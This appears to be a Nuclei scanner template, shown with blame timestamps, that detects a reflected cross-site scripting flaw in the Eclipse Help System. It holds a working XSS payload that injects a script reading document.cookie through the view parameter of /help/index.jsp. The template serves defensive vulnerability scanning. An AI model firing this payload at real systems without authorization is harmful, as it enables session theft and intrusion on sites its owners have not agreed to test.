2020-08-30 05:05:28 +00:00
|
|
|
id: eclipse-help-system-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Eclipse Help System RXSS vulnerability
|
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: ibm,xss
|
2020-08-30 05:08:28 +00:00
|
|
|
|
2020-08-30 05:05:28 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-03 15:56:31 +00:00
|
|
|
- "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
|
2020-08-30 05:05:28 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<script>alert(document.cookie)</script>"
|
|
|
|
part: body
|
2020-12-13 19:24:23 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|